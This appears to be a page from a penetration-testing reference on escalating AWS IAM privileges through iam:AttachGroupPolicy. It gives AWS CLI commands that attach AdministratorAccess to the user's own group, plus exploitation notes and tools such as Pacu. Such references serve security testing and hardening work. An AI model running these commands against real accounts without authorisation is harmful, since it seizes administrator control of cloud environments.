iam:AttachGroupPolicy attaches a managed policy to a group. Because a user inherits every policy on the groups it belongs to, attaching AdministratorAccess to any group containing your user promotes you.
Attach to your group#
aws iam list-groups-for-user --user-name <you>
aws iam attach-group-policy --group-name <your-group> \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Exploitation notes#
- Confirm your membership first; the escalation only lands if your user is in the targeted group.
- Adding yourself to an already-privileged group instead is the group membership path.
Tools#
- AWS CLI (
iam attach-group-policy). - Pacu (
iam__privesc_scan).